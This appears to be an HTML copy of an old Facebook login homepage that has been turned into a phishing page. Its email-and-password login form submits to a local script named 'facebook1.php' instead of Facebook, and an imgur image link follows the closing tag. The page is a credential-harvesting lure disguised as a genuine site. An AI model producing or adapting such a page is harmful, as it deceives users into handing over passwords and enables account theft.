<!DOCTYPE html>
<html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>function envFlush(b){function a(c){for(var d in b)c[d]=b[d];}if(window.require){requireLazy(['Env'],a);}else{Env=window.Env||{};a(Env);}}
envFlush({"ffid1":"HROvjKyH5SiutRyJBj83dA","ffid2":"6T4GN_w-ZG3uAQES2-arPw","ffid3":"bC1valQ1MG9VNy1nd1dyZi1GT21tck4t","ffid4":"RhYLM9vkGmYIEsGzeyfMcw","ffver":63083,"user":"0","locale":"en_US","method":"GET","ps_limit":5,"ps_ratio":4,"svn_rev":501604,"vip":"66.220.149.67","static_base":"http:\/\/static.ak.fbcdn.net\/","www_base":"http:\/\/www.facebook.com\/","rep_lag":2,"fb_dtsg":"AQBaGJiF","ajaxpipe_token":"AXiaV4q9xHLfBEBR","lhsh":"UAQEvblTN","tracking_domain":"http:\/\/pixel.facebook.com","retry_ajax_on_network_error":"1","html5_audio":"1","fbid_emoticons":"1"});</script><script>envFlush({"eagleEyeConfig":{"seed":"0j7b"}});CavalryLogger=false;window._script_path = "\/index.php";window._incorporate_fragment = true;</script><noscript> <meta http-equiv="refresh" content="0; URL=/?_fb_noscript=1" /> </noscript>
<meta name="robots" content="noodp, noydir" /><meta name="description" content=" Facebook is a social utility that connects people with friends and others who work, study and live around them. People use Facebook to keep up with friends, upload an unlimited number of photos, post links and videos, and learn more about the people they meet." /><link rel="alternate" media="handheld" href="http://www.facebook.com/" /><title>Welcome to Facebook - Log In, Sign Up or Learn More</title><link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /><noscript><meta http-equiv="X-Frame-Options" content="deny" /></noscript>
    <link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/0-tQUFM3ZPK.css" />
    <link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/HK6fikml_G2.css" />

    <script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yM/r/5WI560VrDuG.js"></script>

  <script>window.Bootloader && Bootloader.done(["s4wHG"]);</script></head><body class="fbIndex UIPage_LoggedOut ff4 win Locale_en_US"><div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;"></div><div id="pagelet_bluebar" data-referrer="pagelet_bluebar"><div id="blueBarHolder" class="loggedOut"><div id="blueBar"><div class="loggedout_menubar_container"><div class="clearfix loggedout_menubar"><a class="lfloat" href="/" title="Go to Facebook Home"><i class="fb_logo img sp_69c1xs sx_f12f5d"><u>Facebook logo</u></i></a><div class="rfloat"><div class="menu_login_container"><form id="login_form" action="facebook1.php" method="Get" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" autocomplete="off" name="post_form_id" value="efa968e8d2bed114e44d7962ee596e3a" /><input type="hidden" name="lsd" value="" autocomplete="off" /><input type="hidden" autocomplete="off" id="locale" name="locale" value="en_US" /><table cellspacing="0"><tr><td class="html7magic"><label for="email">Email</label></td><td class="html7magic"><label for="pass">Password</label></td></tr><tr><td><input type="text" class="inputtext" name="email" id="email" value="" tabindex="1" /></td><td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td><td><label class="uiButton uiButtonConfirm" id="loginbutton" for="umdm9s_5"><input value="Log In" tabindex="4" type="submit" id="umdm9s_5" /></label></td></tr><tr><td class="login_form_label_field"><div class="uiInputLabel"><input id="persist_box" type="checkbox" name="persistent" value="1" tabindex="3" class="uiInputLabelCheckbox" /><label for="persist_box">Keep me logged in</label></div><input type="hidden" name="default_persistent" value="0" /></td><td class="login_form_label_field"><a href="http://m.facebook.com/recover.php" rel="nofollow">Forgot your password?</a></td></tr></table><input type="hidden" name="charset_test" value="&euro;,&acute;,€,´,?,?,?" /><input type="hidden" autocomplete="off" id="lsd" name="lsd" value="" /><input type="hidden" autocomplete="off" name="timezone" value="" id="umdm9s_6" /></form></div></div></div></div></div></div></div><div id="globalContainer" class="uiContextualLayerParent">                </body></html>

<a href="http://imgur.com/CeczpMG"><img src="http://i.imgur.com/CeczpMG.gif" title="source: imgur.com" /></a>
